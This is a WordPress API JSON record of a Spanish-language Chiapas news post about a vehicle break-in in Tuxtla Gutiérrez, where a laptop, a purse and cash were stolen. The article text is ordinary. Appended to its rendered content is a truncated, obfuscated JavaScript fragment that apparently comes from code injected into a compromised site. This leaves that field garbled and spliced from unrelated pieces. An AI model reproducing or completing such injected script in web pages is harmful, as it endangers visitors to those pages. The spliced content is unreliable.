{"id":10019,"date":"2023-05-13T05:16:04","date_gmt":"2023-05-13T05:16:04","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=10019"},"modified":"2023-05-13T05:16:05","modified_gmt":"2023-05-13T05:16:05","slug":"cristalean-camioneta-y-se-llevan-cuantioso-botin","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=10019","title":{"rendered":"Cristalean camioneta y se llevan cuantioso bot\u00edn"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"540\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683954807230.jpg\" alt=\"\" class=\"wp-image-10020\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683954807230.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1683954807230-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 12 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Este viernes por la noche fue cristaleada una camioneta Toyota, de color azul con placas DR J477-B del estado de Chiapas la cual estaba estacionada en la Avenida M\u00e9xico, entre Costa Rica y Bulevar Belisario Dom\u00ednguez.De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando el propietario de nombre Jorge &#8220;N&#8221; tras haber dejado la unidad para ingresar a una escuela de artes marciales y al regresar se di\u00f3 cuenta que estaba rota la ventanilla.Al realizar una revisi\u00f3n se percat\u00f3 que hac\u00eda falta una laptop con valor de 4 mil pesos, una cartera de dama con documentos y 3 mil pesos en efectivo.Al lugar arribaron elementos de la polic\u00eda para tomar datos y recomendar que presentara su denuncia correspondiente.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 12 de mayo del 2023. Tuxtla Guti\u00e9rrez.- Este viernes por la noche fue cristaleada una camioneta Toyota, de color azul con placas DR J477-B del estado de Chiapas la cual estaba estacionada en la Avenida M\u00e9xico, entre Costa Rica y Bulevar Belisario Dom\u00ednguez.De acuerdo con los reportes oficiales, este hecho ocurri\u00f3 cuando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":10020,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-10019","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10019","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=10019"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10019\/revisions"}],"predecessor-version":[{"id":10021,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/10019\/revisions\/10021"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/10020"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=10019"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=10019"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=10019"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}